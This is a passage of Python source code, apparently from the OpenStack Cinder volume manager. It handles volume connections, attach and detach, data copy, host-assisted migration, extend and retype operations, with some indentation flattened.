if image_status == 'queued' or image_status == 'saving':
LOG.warning(_LW("Deleting image in unexpected status: "
"%(image_status)s."),
{'image_status': image_status},
resource={'type': 'image', 'id': image_id})
image_service.delete(context, image_id)
except Exception:
LOG.warning(_LW("Image delete encountered an error."),
exc_info=True, resource={'type': 'image',
'id': image_id})
def _parse_connection_options(self, context, volume, conn_info):
# Add qos_specs to connection info
typeid = volume.volume_type_id
specs = None
if typeid:
res = volume_types.get_volume_type_qos_specs(typeid)
qos = res['qos_specs']
# only pass qos_specs that is designated to be consumed by
# front-end, or both front-end and back-end.
if qos and qos.get('consumer') in ['front-end', 'both']:
specs = qos.get('specs')
qos_spec = dict(qos_specs=specs)
conn_info['data'].update(qos_spec)
# Add access_mode to connection info
volume_metadata = volume.admin_metadata
access_mode = volume_metadata.get('attached_mode')
if access_mode is None:
# NOTE(zhiyan): client didn't call 'os-attach' before
access_mode = ('ro'
if volume_metadata.get('readonly') == 'True'
else 'rw')
conn_info['data']['access_mode'] = access_mode
# Add encrypted flag to connection_info if not set in the driver.
if conn_info['data'].get('encrypted') is None:
encrypted = bool(volume.encryption_key_id)
conn_info['data']['encrypted'] = encrypted
# Add discard flag to connection_info if not set in the driver and
# configured to be reported.
if conn_info['data'].get('discard') is None:
discard_supported = (self.driver.configuration
.safe_get('report_discard_supported'))
if discard_supported:
conn_info['data']['discard'] = True
return conn_info
def initialize_connection(self, context, volume, connector):
    """Prepare volume for connection from host represented by connector.

    This method calls the driver initialize_connection and returns
    it to the caller.  The connector parameter is a dictionary with
    information about the host that will connect to the volume in the
    following format::

        {
            'ip': ip,
            'initiator': initiator,
        }

    ip: the ip address of the connecting machine

    initiator: the iscsi initiator name of the connecting machine.
    This can be None if the connecting machine does not support iscsi
    connections.

    driver is responsible for doing any necessary security setup and
    returning a connection_info dictionary in the following format::

        {
            'driver_volume_type': driver_volume_type,
            'data': data,
        }

    driver_volume_type: a string to identify the type of volume.  This
                       can be used by the calling code to determine the
                       strategy for connecting to the volume. This could
                       be 'iscsi', 'rbd', 'sheepdog', etc.

    data: this is the data that the calling code will use to connect
          to the volume. Keep in mind that this will be serialized to
          json in various places, so it should not contain any non-json
          data types.
    """
    # NOTE(flaper87): Verify the driver is enabled
    # before going forward. The exception will be caught
    # and the volume status updated.
    # TODO(jdg): Add deprecation warning
    utils.require_driver_initialized(self.driver)

    # Stage 1: validate the connector the caller supplied.
    try:
        self.driver.validate_connector(connector)
    except exception.InvalidConnectorException as err:
        raise exception.InvalidInput(reason=six.text_type(err))
    except Exception as err:
        err_msg = (_("Validate volume connection failed "
                     "(error: %(err)s).") % {'err': six.text_type(err)})
        LOG.exception(err_msg, resource=volume)
        raise exception.VolumeBackendAPIException(data=err_msg)

    # Stage 2: export the volume on the backend.
    try:
        model_update = self.driver.create_export(context.elevated(),
                                                 volume, connector)
    except exception.CinderException as ex:
        msg = _("Create export of volume failed (%s)") % ex.msg
        LOG.exception(msg, resource=volume)
        raise exception.VolumeBackendAPIException(data=msg)

    # Persist any model changes the export produced.
    try:
        if model_update:
            volume.update(model_update)
            volume.save()
    except exception.CinderException as ex:
        LOG.exception(_LE("Model update failed."), resource=volume)
        raise exception.ExportFailure(reason=six.text_type(ex))

    # Stage 3: build the connection info; undo the export on failure.
    try:
        conn_info = self.driver.initialize_connection(volume, connector)
    except Exception as err:
        err_msg = (_("Driver initialize connection failed "
                     "(error: %(err)s).") % {'err': six.text_type(err)})
        LOG.exception(err_msg, resource=volume)

        self.driver.remove_export(context.elevated(), volume)

        raise exception.VolumeBackendAPIException(data=err_msg)

    # Add qos, access_mode, encrypted and discard options.
    conn_info = self._parse_connection_options(context, volume, conn_info)
    LOG.info(_LI("Initialize volume connection completed successfully."),
             resource=volume)
    return conn_info
def terminate_connection(self, context, volume_id, connector, force=False):
    """Cleanup connection from host represented by connector.

    The format of connector is the same as for initialize_connection.
    """
    # NOTE(flaper87): Verify the driver is enabled
    # before going forward. The exception will be caught
    # and the volume status updated.
    utils.require_driver_initialized(self.driver)

    vol_ref = self.db.volume_get(context, volume_id)
    try:
        self.driver.terminate_connection(vol_ref, connector, force=force)
    except Exception as err:
        err_msg = (_('Terminate volume connection failed: %(err)s')
                   % {'err': six.text_type(err)})
        LOG.exception(err_msg, resource=vol_ref)
        raise exception.VolumeBackendAPIException(data=err_msg)
    else:
        LOG.info(_LI("Terminate volume connection completed successfully."),
                 resource=vol_ref)
def remove_export(self, context, volume_id):
    """Removes an export for a volume."""
    # Driver must be initialized before we touch the backend.
    utils.require_driver_initialized(self.driver)

    vol_ref = self.db.volume_get(context, volume_id)
    try:
        self.driver.remove_export(context, vol_ref)
    except Exception:
        msg = _("Remove volume export failed.")
        LOG.exception(msg, resource=vol_ref)
        raise exception.VolumeBackendAPIException(data=msg)
    else:
        LOG.info(_LI("Remove volume export completed successfully."),
                 resource=vol_ref)
def accept_transfer(self, context, volume_id, new_user, new_project):
    """Accept ownership transfer of a volume to a new user and project.

    :returns: the driver's model update (may be None).
    """
    # NOTE(flaper87): Verify the driver is enabled
    # before going forward. The exception will be caught
    # and the volume status updated.
    utils.require_driver_initialized(self.driver)

    # NOTE(jdg): need elevated context as we haven't "given" the vol
    # yet
    volume_ref = self.db.volume_get(context.elevated(), volume_id)

    # NOTE(jdg): Some drivers tie provider info (CHAP) to tenant
    # for those that do allow them to return updated model info
    model_update = self.driver.accept_transfer(context, volume_ref,
                                               new_user, new_project)

    if model_update:
        try:
            self.db.volume_update(context.elevated(), volume_id,
                                  model_update)
        except exception.CinderException:
            with excutils.save_and_reraise_exception():
                LOG.exception(_LE("Update volume model for "
                                  "transfer operation failed."),
                              resource=volume_ref)
                self.db.volume_update(context.elevated(), volume_id,
                                      {'status': 'error'})

    LOG.info(_LI("Transfer volume completed successfully."),
             resource=volume_ref)
    return model_update
def _connect_device(self, conn):
    """Connect this host to the device described by conn.

    :param conn: connection info as returned by initialize_connection().
    :returns: dict with 'conn', 'device' (volume handle) and 'connector'.
    :raises: exception.DeviceUnavailable when the attached device cannot
        be read.
    """
    cfg = self.configuration
    connector = utils.brick_get_connector(
        conn['driver_volume_type'],
        use_multipath=cfg.use_multipath_for_image_xfer,
        device_scan_attempts=cfg.num_volume_device_scan_tries,
        conn=conn)
    vol_handle = connector.connect_volume(conn['data'])

    # Verify we can actually read the device (as root) before handing
    # it back to the caller.
    path = vol_handle['path']
    if not connector.check_valid_device(path, True):
        if isinstance(path, six.string_types):
            raise exception.DeviceUnavailable(
                path=path,
                reason=(_("Unable to access the backend storage via the "
                          "path %(path)s.") %
                        {'path': path}))
        raise exception.DeviceUnavailable(
            path=None,
            reason=(_("Unable to access the backend storage via file "
                      "handle.")))

    return {'conn': conn, 'device': vol_handle, 'connector': connector}
def _attach_volume(self, ctxt, volume, properties, remote=False,
                   attach_encryptor=False):
    """Attach a volume to this host for data copy and return attach info.

    :param ctxt: request context.
    :param volume: volume to attach.
    :param properties: brick connector properties of this host.
    :param remote: if True, the volume lives on another backend and the
        connection is set up through the volume RPC API.
    :param attach_encryptor: if True and the volume type is encrypted,
        also attach the volume encryptor so data goes through dm-crypt.
    :returns: attach info dict as produced by _connect_device().
    """
    status = volume['status']

    if remote:
        rpcapi = volume_rpcapi.VolumeAPI()
        try:
            conn = rpcapi.initialize_connection(ctxt, volume, properties)
        except Exception:
            with excutils.save_and_reraise_exception():
                LOG.error(_LE("Failed to attach volume %(vol)s."),
                          {'vol': volume['id']})
                # Restore the pre-attach status on failure.
                self.db.volume_update(ctxt, volume['id'],
                                      {'status': status})
    else:
        conn = self.initialize_connection(ctxt, volume, properties)

    attach_info = self._connect_device(conn)
    try:
        if attach_encryptor and (
                volume_types.is_encrypted(ctxt,
                                          volume.volume_type_id)):
            encryption = self.db.volume_encryption_metadata_get(
                ctxt.elevated(), volume.id)
            if encryption:
                utils.brick_attach_volume_encryptor(ctxt,
                                                    attach_info,
                                                    encryption)
    except Exception:
        with excutils.save_and_reraise_exception():
            LOG.error(_LE("Failed to attach volume encryptor"
                          " %(vol)s."), {'vol': volume['id']})
            # Roll back the device attach made just above.
            self._detach_volume(ctxt, attach_info, volume, properties)
    return attach_info
def _detach_volume(self, ctxt, attach_info, volume, properties,
                   force=False, remote=False,
                   attach_encryptor=False):
    """Detach a volume previously attached with _attach_volume().

    :param ctxt: request context.
    :param attach_info: dict returned by _connect_device().
    :param volume: volume to detach.
    :param properties: brick connector properties of this host.
    :param force: passed through to terminate_connection().
    :param remote: if True, tear the connection down through the volume
        RPC API instead of the local backend.
    :param attach_encryptor: if True and the volume type is encrypted,
        detach the volume encryptor before disconnecting the device.
    """
    connector = attach_info['connector']
    if attach_encryptor and (
            volume_types.is_encrypted(ctxt,
                                      volume.volume_type_id)):
        encryption = self.db.volume_encryption_metadata_get(
            ctxt.elevated(), volume.id)
        if encryption:
            utils.brick_detach_volume_encryptor(attach_info, encryption)
    connector.disconnect_volume(attach_info['conn']['data'],
                                attach_info['device'])

    if remote:
        rpcapi = volume_rpcapi.VolumeAPI()
        rpcapi.terminate_connection(ctxt, volume, properties, force=force)
        rpcapi.remove_export(ctxt, volume)
    else:
        try:
            self.terminate_connection(ctxt, volume['id'], properties,
                                      force=force)
            self.remove_export(ctxt, volume['id'])
        except Exception as err:
            with excutils.save_and_reraise_exception():
                # BUGFIX: pass interpolation args lazily to LOG.error
                # (OpenStack logging convention) instead of eagerly
                # formatting with '%', so formatting only happens when
                # the record is emitted.
                LOG.error(_LE('Unable to terminate volume connection: '
                              '%(err)s.'), {'err': err})
    def _copy_volume_data(self, ctxt, src_vol, dest_vol, remote=None):
        """Copy data from src_vol to dest_vol.

        :param remote: one of None, 'src', 'dest' or 'both' — which side(s)
                       must be attached via RPC on their own backend.
        :raises: re-raises attach/copy failures after detaching whatever
                 was already attached.
        """
        LOG.debug('copy_data_between_volumes %(src)s -> %(dest)s.',
                  {'src': src_vol['name'], 'dest': dest_vol['name']})
        attach_encryptor = False
        # If the encryption method or key is changed, we have to
        # copy data through dm-crypt.
        if volume_types.volume_types_encryption_changed(
                ctxt,
                src_vol.volume_type_id,
                dest_vol.volume_type_id):
            attach_encryptor = True
        properties = utils.brick_get_connector_properties()

        dest_remote = remote in ['dest', 'both']
        dest_attach_info = self._attach_volume(
            ctxt, dest_vol, properties,
            remote=dest_remote,
            attach_encryptor=attach_encryptor)

        try:
            src_remote = remote in ['src', 'both']
            src_attach_info = self._attach_volume(
                ctxt, src_vol, properties,
                remote=src_remote,
                attach_encryptor=attach_encryptor)
        except Exception:
            with excutils.save_and_reraise_exception():
                LOG.error(_LE("Failed to attach source volume for copy."))
                # The destination was already attached above; release it
                # before propagating the source-attach failure.
                self._detach_volume(ctxt, dest_attach_info, dest_vol,
                                    properties, remote=dest_remote,
                                    attach_encryptor=attach_encryptor)

        # Check the backend capabilities of migration destination host.
        rpcapi = volume_rpcapi.VolumeAPI()
        capabilities = rpcapi.get_capabilities(ctxt,
                                               dest_vol.service_topic_queue,
                                               False)
        sparse_copy_volume = bool(capabilities and
                                  capabilities.get('sparse_copy_volume',
                                                   False))

        # copy_error stays True unless the dd completes; it drives
        # force=... on the detaches below so a half-written destination is
        # forcefully disconnected.
        copy_error = True
        try:
            size_in_mb = int(src_vol['size']) * units.Ki  # vol size is in GB
            vol_utils.copy_volume(src_attach_info['device']['path'],
                                  dest_attach_info['device']['path'],
                                  size_in_mb,
                                  self.configuration.volume_dd_blocksize,
                                  sparse=sparse_copy_volume)
            copy_error = False
        except Exception:
            with excutils.save_and_reraise_exception():
                LOG.error(_LE("Failed to copy volume %(src)s to %(dest)s."),
                          {'src': src_vol['id'], 'dest': dest_vol['id']})
        finally:
            # Nested finally: detach the source even if detaching the
            # destination raises.
            try:
                self._detach_volume(ctxt, dest_attach_info, dest_vol,
                                    properties, force=copy_error,
                                    remote=dest_remote,
                                    attach_encryptor=attach_encryptor)
            finally:
                self._detach_volume(ctxt, src_attach_info, src_vol,
                                    properties, force=copy_error,
                                    remote=src_remote,
                                    attach_encryptor=attach_encryptor)
    def _migrate_volume_generic(self, ctxt, volume, backend, new_type_id):
        """Host-assisted migration of *volume* to *backend*.

        Creates a placeholder volume on the destination backend, waits for
        it to become available, then either copies the data directly (for
        detached volumes, completing the migration synchronously) or asks
        Nova to swap the attachment (in-use volumes, completed
        asynchronously via a callback).

        :param new_type_id: optional volume type for the destination volume
                            (retype-with-migration case)
        :raises VolumeMigrationFailed: if the destination volume errors out
                                       or does not become available in time
        """
        rpcapi = volume_rpcapi.VolumeAPI()

        # Create new volume on remote host
        tmp_skip = {'snapshot_id', 'source_volid'}
        skip = self._VOLUME_CLONE_SKIP_PROPERTIES | tmp_skip | {'host',
                                                                'cluster_name'}
        new_vol_values = {k: volume[k] for k in set(volume.keys()) - skip}
        if new_type_id:
            new_vol_values['volume_type_id'] = new_type_id
            # A new type may imply different encryption; allocate a fresh
            # key for the destination in that case.
            if volume_types.volume_types_encryption_changed(
                    ctxt, volume.volume_type_id, new_type_id):
                encryption_key_id = vol_utils.create_encryption_key(
                    ctxt, self.key_manager, new_type_id)
                new_vol_values['encryption_key_id'] = encryption_key_id
        new_volume = objects.Volume(
            context=ctxt,
            host=backend['host'],
            cluster_name=backend.get('cluster_name'),
            status='creating',
            attach_status=fields.VolumeAttachStatus.DETACHED,
            migration_status='target:%s' % volume['id'],
            **new_vol_values
        )
        new_volume.create()
        rpcapi.create_volume(ctxt, new_volume, None, None,
                             allow_reschedule=False)

        # Wait for new_volume to become ready
        starttime = time.time()
        deadline = starttime + CONF.migration_create_volume_timeout_secs
        # TODO(thangp): Replace get_by_id with refresh when it is available
        new_volume = objects.Volume.get_by_id(ctxt, new_volume.id)
        tries = 0
        while new_volume.status != 'available':
            tries += 1
            now = time.time()
            if new_volume.status == 'error':
                msg = _("failed to create new_volume on destination")
                self._clean_temporary_volume(ctxt, volume,
                                             new_volume,
                                             clean_db_only=True)
                raise exception.VolumeMigrationFailed(reason=msg)
            elif now > deadline:
                msg = _("timeout creating new_volume on destination")
                self._clean_temporary_volume(ctxt, volume,
                                             new_volume,
                                             clean_db_only=True)
                raise exception.VolumeMigrationFailed(reason=msg)
            else:
                # Quadratic back-off between polls of the destination.
                time.sleep(tries ** 2)
            # TODO(thangp): Replace get_by_id with refresh when it is
            # available
            new_volume = objects.Volume.get_by_id(ctxt, new_volume.id)

        # Set skipped value to avoid calling
        # function except for _create_raw_volume
        tmp_skipped_values = {k: volume[k] for k in tmp_skip if volume.get(k)}
        if tmp_skipped_values:
            new_volume.update(tmp_skipped_values)
            new_volume.save()

        # Copy the source volume to the destination volume
        try:
            attachments = volume.volume_attachment
            if not attachments:
                # Pre- and post-copy driver-specific actions
                self.driver.before_volume_copy(ctxt, volume, new_volume,
                                               remote='dest')
                self._copy_volume_data(ctxt, volume, new_volume, remote='dest')
                self.driver.after_volume_copy(ctxt, volume, new_volume,
                                              remote='dest')

                # The above call is synchronous so we complete the migration
                self.migrate_volume_completion(ctxt, volume, new_volume,
                                               error=False)
            else:
                nova_api = compute.API()
                # This is an async call to Nova, which will call the completion
                # when it's done
                for attachment in attachments:
                    instance_uuid = attachment['instance_uuid']
                    nova_api.update_server_volume(ctxt, instance_uuid,
                                                  volume.id,
                                                  new_volume.id)
        except Exception:
            with excutils.save_and_reraise_exception():
                LOG.exception(_LE(
                    "Failed to copy volume %(vol1)s to %(vol2)s"), {
                        'vol1': volume.id, 'vol2': new_volume.id})
                self._clean_temporary_volume(ctxt, volume,
                                             new_volume)
    def _clean_temporary_volume(self, ctxt, volume, new_volume,
                                clean_db_only=False):
        """Clean up the temporary destination volume of a failed migration.

        :param volume: the migration source volume (its migration_status
                       decides whether deleting the destination is safe)
        :param new_volume: the temporary destination volume
        :param clean_db_only: if True, only the DB record of *new_volume*
                              exists (backend creation never happened), so
                              just destroy the row.
        """
        # If we're in the migrating phase, we need to cleanup
        # destination volume because source volume is remaining
        if volume.migration_status == 'migrating':
            try:
                if clean_db_only:
                    # The temporary volume is not created, only DB data
                    # is created
                    new_volume.destroy()
                else:
                    # The temporary volume is already created
                    rpcapi = volume_rpcapi.VolumeAPI()
                    rpcapi.delete_volume(ctxt, new_volume)
            except exception.VolumeNotFound:
                LOG.info(_LI("Couldn't find the temporary volume "
                             "%(vol)s in the database. There is no need "
                             "to clean up this volume."),
                         {'vol': new_volume.id})
        else:
            # If we're in the completing phase don't delete the
            # destination because we may have already deleted the
            # source! But the migration_status in database should
            # be cleared to handle volume after migration failure
            try:
                new_volume.migration_status = None
                new_volume.save()
            except exception.VolumeNotFound:
                LOG.info(_LI("Couldn't find destination volume "
                             "%(vol)s in the database. The entry might be "
                             "successfully deleted during migration "
                             "completion phase."),
                         {'vol': new_volume.id})

            LOG.warning(_LW("Failed to migrate volume. The destination "
                            "volume %(vol)s is not deleted since the "
                            "source volume may have been deleted."),
                        {'vol': new_volume.id})
    def migrate_volume_completion(self, ctxt, volume, new_volume, error=False):
        """Finish (or roll back) a host-assisted migration.

        Swaps the source and destination DB records so callers keep using
        the original volume id, re-attaches where needed, and schedules
        async deletion of the old backend volume.

        :param error: if True, abort — delete the destination volume and
                      restore the source volume's original status.
        :returns: the surviving volume's id
        """
        try:
            # NOTE(flaper87): Verify the driver is enabled
            # before going forward. The exception will be caught
            # and the migration status updated.
            utils.require_driver_initialized(self.driver)
        except exception.DriverNotInitialized:
            with excutils.save_and_reraise_exception():
                volume.migration_status = 'error'
                volume.save()

        LOG.debug("migrate_volume_completion: completing migration for "
                  "volume %(vol1)s (temporary volume %(vol2)s",
                  {'vol1': volume.id, 'vol2': new_volume.id})
        rpcapi = volume_rpcapi.VolumeAPI()

        orig_volume_status = volume.previous_status

        if error:
            LOG.info(_LI("migrate_volume_completion is cleaning up an error "
                         "for volume %(vol1)s (temporary volume %(vol2)s"),
                     {'vol1': volume['id'], 'vol2': new_volume.id})
            rpcapi.delete_volume(ctxt, new_volume)
            updates = {'migration_status': 'error',
                       'status': orig_volume_status}
            volume.update(updates)
            volume.save()
            return volume.id

        volume.migration_status = 'completing'
        volume.save()

        # Detach the source volume (if it fails, don't fail the migration)
        # As after detach and refresh, volume_attachments will be None.
        # We keep volume_attachment for later attach.
        volume_attachments = []
        if orig_volume_status == 'in-use':
            for attachment in volume.volume_attachment:
                # Save the attachments the volume currently have
                volume_attachments.append(attachment)
                try:
                    self.detach_volume(ctxt, volume.id, attachment.id)
                except Exception as ex:
                    LOG.error(_LE("Detach migration source volume "
                                  "%(volume.id)s from instance "
                                  "%(instance_id)s failed: %(err)s"),
                              {'err': ex,
                               'volume.id': volume.id,
                               'instance_id': attachment.id},
                              resource=volume)

        # Give driver (new_volume) a chance to update things as needed
        # after a successful migration.
        # Note this needs to go through rpc to the host of the new volume
        # the current host and driver object is for the "existing" volume.
        rpcapi.update_migrated_volume(ctxt, volume, new_volume,
                                      orig_volume_status)
        volume.refresh()
        new_volume.refresh()

        # Swap src and dest DB records so we can continue using the src id and
        # asynchronously delete the destination id
        updated_new = volume.finish_volume_migration(new_volume)
        updates = {'status': orig_volume_status,
                   'previous_status': volume.status,
                   'migration_status': 'success'}

        # Restore the attachments
        if orig_volume_status == 'in-use':
            for attachment in volume_attachments:
                LOG.debug('Re-attaching: %s', attachment)
                rpcapi.attach_volume(ctxt, volume,
                                     attachment.instance_uuid,
                                     attachment.attached_host,
                                     attachment.mountpoint,
                                     'rw')
        volume.update(updates)
        volume.save()

        # Asynchronous deletion of the source volume in the back-end (now
        # pointed by the target volume id)
        try:
            rpcapi.delete_volume(ctxt, updated_new)
        except Exception as ex:
            # Best-effort: failure to queue the async delete is logged but
            # does not fail the (already completed) migration.
            LOG.error(_LE('Failed to request async delete of migration source '
                          'vol %(vol)s: %(err)s'),
                      {'vol': volume.id, 'err': ex})

        LOG.info(_LI("Complete-Migrate volume completed successfully."),
                 resource=volume)
        return volume.id
    def migrate_volume(self, ctxt, volume, host, force_host_copy=False,
                       new_type_id=None):
        """Migrate the volume to the specified host (called on source host).

        Tries a driver-native migration first (unless *force_host_copy* is
        set or the type is changing); if the driver declines or fails to
        move the volume, falls back to the generic host-assisted copy.

        :param host: destination backend dict ('host', 'cluster_name')
        :param force_host_copy: skip driver migration, always host-copy
        :param new_type_id: optional new volume type (retype-with-migration)
        """
        try:
            # NOTE(flaper87): Verify the driver is enabled
            # before going forward. The exception will be caught
            # and the migration status updated.
            utils.require_driver_initialized(self.driver)
        except exception.DriverNotInitialized:
            with excutils.save_and_reraise_exception():
                volume.migration_status = 'error'
                volume.save()

        model_update = None
        moved = False

        status_update = None
        # Remember the pre-retype/maintenance status so it can be restored.
        if volume.status in ('retyping', 'maintenance'):
            status_update = {'status': volume.previous_status}

        volume.migration_status = 'migrating'
        volume.save()
        if not force_host_copy and new_type_id is None:
            try:
                LOG.debug("Issue driver.migrate_volume.", resource=volume)
                moved, model_update = self.driver.migrate_volume(ctxt,
                                                                 volume,
                                                                 host)
                if moved:
                    updates = {'host': host['host'],
                               'cluster_name': host.get('cluster_name'),
                               'migration_status': 'success',
                               'previous_status': volume.status}
                    if status_update:
                        updates.update(status_update)
                    if model_update:
                        updates.update(model_update)
                    volume.update(updates)
                    volume.save()
            except Exception:
                with excutils.save_and_reraise_exception():
                    updates = {'migration_status': 'error'}
                    if status_update:
                        updates.update(status_update)
                    volume.update(updates)
                    volume.save()
        if not moved:
            # Driver could not (or was not asked to) migrate: generic copy.
            try:
                self._migrate_volume_generic(ctxt, volume, host, new_type_id)
            except Exception:
                with excutils.save_and_reraise_exception():
                    updates = {'migration_status': 'error'}
                    if status_update:
                        updates.update(status_update)
                    volume.update(updates)
                    volume.save()
        LOG.info(_LI("Migrate volume completed successfully."),
                 resource=volume)
@periodic_task.periodic_task
def _report_driver_status(self, context):
if not self.driver.initialized:
if self.driver.configuration.config_group is None:
config_group = ''
else:
config_group = ('(config name %s)' %
self.driver.configuration.config_group)
LOG.warning(_LW("Update driver status failed: %(config_group)s "
"is uninitialized."),
{'config_group': config_group},
resource={'type': 'driver',
'id': self.driver.__class__.__name__})
else:
volume_stats = self.driver.get_volume_stats(refresh=True)
if self.extra_capabilities:
volume_stats.update(self.extra_capabilities)
if volume_stats:
# Append volume stats with 'allocated_capacity_gb'
self._append_volume_stats(volume_stats)
# Append filter and goodness function if needed
volume_stats = (
self._append_filter_goodness_functions(volume_stats))
# queue it to be sent to the Schedulers.
self.update_service_capabilities(volume_stats)
def _append_volume_stats(self, vol_stats):
pools = vol_stats.get('pools', None)
if pools and isinstance(pools, list):
for pool in pools:
pool_name = pool['pool_name']
try:
pool_stats = self.stats['pools'][pool_name]
except KeyError:
# Pool not found in volume manager
pool_stats = dict(allocated_capacity_gb=0)
pool.update(pool_stats)
def _append_filter_goodness_functions(self, volume_stats):
"""Returns volume_stats updated as needed."""
# Append filter_function if needed
if 'filter_function' not in volume_stats:
volume_stats['filter_function'] = (
self.driver.get_filter_function())
# Append goodness_function if needed
if 'goodness_function' not in volume_stats:
volume_stats['goodness_function'] = (
self.driver.get_goodness_function())
return volume_stats
def publish_service_capabilities(self, context):
"""Collect driver status and then publish."""
self._report_driver_status(context)
self._publish_service_capabilities(context)
def _notify_about_volume_usage(self,
context,
volume,
event_suffix,
extra_usage_info=None):
vol_utils.notify_about_volume_usage(
context, volume, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
def _notify_about_snapshot_usage(self,
context,
snapshot,
event_suffix,
extra_usage_info=None):
vol_utils.notify_about_snapshot_usage(
context, snapshot, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
def _notify_about_consistencygroup_usage(self,
context,
group,
event_suffix,
volumes=None,
extra_usage_info=None):
vol_utils.notify_about_consistencygroup_usage(
context, group, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
if not volumes:
volumes = self.db.volume_get_all_by_group(context, group.id)
if volumes:
for volume in volumes:
vol_utils.notify_about_volume_usage(
context, volume, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
def _notify_about_group_usage(self,
context,
group,
event_suffix,
volumes=None,
extra_usage_info=None):
vol_utils.notify_about_group_usage(
context, group, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
if not volumes:
volumes = self.db.volume_get_all_by_generic_group(
context, group.id)
if volumes:
for volume in volumes:
vol_utils.notify_about_volume_usage(
context, volume, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
def _notify_about_cgsnapshot_usage(self,
context,
cgsnapshot,
event_suffix,
snapshots=None,
extra_usage_info=None):
vol_utils.notify_about_cgsnapshot_usage(
context, cgsnapshot, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
if not snapshots:
snapshots = objects.SnapshotList.get_all_for_cgsnapshot(
context, cgsnapshot.id)
if snapshots:
for snapshot in snapshots:
vol_utils.notify_about_snapshot_usage(
context, snapshot, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
def _notify_about_group_snapshot_usage(self,
context,
group_snapshot,
event_suffix,
snapshots=None,
extra_usage_info=None):
vol_utils.notify_about_group_snapshot_usage(
context, group_snapshot, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
if not snapshots:
snapshots = objects.SnapshotList.get_all_for_group_snapshot(
context, group_snapshot.id)
if snapshots:
for snapshot in snapshots:
vol_utils.notify_about_snapshot_usage(
context, snapshot, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
    def extend_volume(self, context, volume, new_size, reservations):
        """Grow *volume* to *new_size* GB, committing the quota on success.

        :param new_size: requested size in GB
        :param reservations: quota reservations to commit (success) or
                             roll back (failure)
        """
        try:
            # NOTE(flaper87): Verify the driver is enabled
            # before going forward. The exception will be caught
            # and the volume status updated.
            utils.require_driver_initialized(self.driver)
        except exception.DriverNotInitialized:
            with excutils.save_and_reraise_exception():
                volume.status = 'error_extending'
                volume.save()

        project_id = volume.project_id
        size_increase = (int(new_size)) - volume.size
        self._notify_about_volume_usage(context, volume, "resize.start")
        try:
            self.driver.extend_volume(volume, new_size)
        except Exception:
            LOG.exception(_LE("Extend volume failed."),
                          resource=volume)
            try:
                self.db.volume_update(context, volume.id,
                                      {'status': 'error_extending'})
                raise exception.CinderException(_("Volume %s: Error trying "
                                                 "to extend volume") %
                                                volume.id)
            finally:
                # NOTE(review): the `return` inside this finally swallows
                # the CinderException raised above after the quota rollback
                # — the method exits quietly on driver failure.  This looks
                # deliberate (status is already 'error_extending'); confirm
                # before changing.
                QUOTAS.rollback(context, reservations, project_id=project_id)
                return

        QUOTAS.commit(context, reservations, project_id=project_id)
        volume.update({'size': int(new_size), 'status': 'available'})
        volume.save()
        pool = vol_utils.extract_host(volume.host, 'pool')
        if pool is None:
            # Legacy volume, put them into default pool
            pool = self.driver.configuration.safe_get(
                'volume_backend_name') or vol_utils.extract_host(
                    volume.host, 'pool', True)

        try:
            self.stats['pools'][pool]['allocated_capacity_gb'] += size_increase
        except KeyError:
            self.stats['pools'][pool] = dict(
                allocated_capacity_gb=size_increase)
        self._notify_about_volume_usage(
            context, volume, "resize.end",
            extra_usage_info={'size': int(new_size)})
        LOG.info(_LI("Extend volume completed successfully."),
                 resource=volume)
def _is_our_backend(self, host, cluster_name):
return ((not cluster_name and
vol_utils.hosts_are_equivalent(self.driver.host, host)) or
(cluster_name and
vol_utils.hosts_are_equivalent(self.driver.cluster_name,
cluster_name)))
    def retype(self, context, volume, new_type_id, host,
               migration_policy='never', reservations=None,
               old_reservations=None):
        """Change *volume*'s type to *new_type_id*, migrating if required.

        Tries, in order: no-op (types are equal), driver retype on the same
        backend, and finally a full migration to *host* — which is only
        allowed when *migration_policy* permits it and the volume has no
        snapshots or replicas.

        :param reservations: new-type quota reservations (committed on
                             success, rolled back on failure)
        :param old_reservations: old-type reservations from the API layer;
                                 reserved here when not provided (legacy)
        :raises VolumeMigrationFailed: migration needed but not allowed
        :raises InvalidVolume: volume has snapshots or is replicated
        """

        def _retype_error(context, volume, old_reservations,
                          new_reservations, status_update):
            # Restore status, then roll back both reservation sets.
            try:
                volume.update(status_update)
                volume.save()
            finally:
                QUOTAS.rollback(context, old_reservations)
                QUOTAS.rollback(context, new_reservations)

        status_update = {'status': volume.previous_status}
        if context.project_id != volume.project_id:
            project_id = volume.project_id
        else:
            project_id = context.project_id

        try:
            # NOTE(flaper87): Verify the driver is enabled
            # before going forward. The exception will be caught
            # and the volume status updated.
            utils.require_driver_initialized(self.driver)
        except exception.DriverNotInitialized:
            with excutils.save_and_reraise_exception():
                # NOTE(flaper87): Other exceptions in this method don't
                # set the volume status to error. Should that be done
                # here? Setting the volume back to it's original status
                # for now.
                volume.update(status_update)
                volume.save()

        # If old_reservations has been passed in from the API, we should
        # skip quotas.
        # TODO(ntpttr): These reservation checks are left in to be backwards
        # compatible with Liberty and can be removed in N.
        if not old_reservations:
            # Get old reservations
            try:
                reserve_opts = {'volumes': -1, 'gigabytes': -volume.size}
                QUOTAS.add_volume_type_opts(context,
                                            reserve_opts,
                                            volume.volume_type_id)
                # NOTE(wanghao): We don't need to reserve volumes and gigabytes
                # quota for retyping operation since they didn't changed, just
                # reserve volume_type and type gigabytes is fine.
                reserve_opts.pop('volumes')
                reserve_opts.pop('gigabytes')
                old_reservations = QUOTAS.reserve(context,
                                                  project_id=project_id,
                                                  **reserve_opts)
            except Exception:
                volume.update(status_update)
                volume.save()
                msg = _("Failed to update quota usage while retyping volume.")
                LOG.exception(msg, resource=volume)
                raise exception.CinderException(msg)

        # We already got the new reservations
        new_reservations = reservations

        # If volume types have the same contents, no need to do anything.
        # Use the admin contex to be able to access volume extra_specs
        retyped = False
        diff, all_equal = volume_types.volume_types_diff(
            context.elevated(), volume.volume_type_id, new_type_id)
        if all_equal:
            retyped = True

        # Call driver to try and change the type
        retype_model_update = None

        # NOTE(jdg): Check to see if the destination host or cluster (depending
